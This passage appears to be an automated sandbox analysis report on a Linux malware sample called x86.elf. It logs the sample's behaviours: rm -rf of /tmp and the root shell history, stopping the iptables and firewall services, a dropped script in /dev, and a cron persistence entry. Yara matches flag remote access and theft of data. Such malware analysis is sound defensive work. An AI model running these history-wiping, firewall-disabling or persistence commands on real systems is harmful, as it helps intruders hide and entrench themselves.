/var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-K1ZmQh /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-Lb1VUf /var/log/wtmp Jump to behavior
Source: /bin/sh (PID: 5503) Rm executable: /usr/bin/rm -> rm -rf /tmp/* Jump to behavior
Source: /bin/sh (PID: 5552) Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history Jump to behavior
Source: /usr/sbin/service (PID: 5527) Systemctl executable: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 5530) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target Jump to behavior
Source: /usr/sbin/service (PID: 5532) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket Jump to behavior
Source: /usr/sbin/service (PID: 5539) Systemctl executable: /usr/bin/systemctl -> systemctl stop firewall.service Jump to behavior
Source: /usr/sbin/service (PID: 5542) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target Jump to behavior
Source: /usr/sbin/service (PID: 5544) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket Jump to behavior
Source: /usr/bin/chmod (PID: 5580) File: /dev/ocmount (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /bin/sh (PID: 5581) Crontab like entry written: /etc/cron.d/mount.sh Jump to dropped file
Source: /tmp/x86.elf (PID: 5558) Writes shell script file to disk with an unusual file extension: /dev/ocmount Jump to dropped file
Source: /usr/sbin/service (PID: 5533) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
Source: /usr/sbin/service (PID: 5545) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
Source: submitted sample Stderr: Failed to stop iptables.service: Unit iptables.service not loaded.Failed to stop firewall.service: Unit firewall.service not loaded.sh: 1: history: not foundsh: 1: history: not found: exit code = 0

Hooking and other Techniques for Hiding and Protection

barindex
Source: /usr/bin/rm (PID: 5494) File: /tmp/x86.elf Jump to behavior
Source: /usr/bin/pkill (PID: 5510) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5519) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5523) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /bin/busybox (PID: 5855) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/busybox (PID: 5873) Queries kernel information via 'uname': Jump to behavior
Source: /bin/busybox (PID: 5877) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/busybox (PID: 5883) Queries kernel information via 'uname': Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: x86.elf, type: SAMPLE
Source: Yara match File source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: x86.elf, type: SAMPLE
Source: Yara match File source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs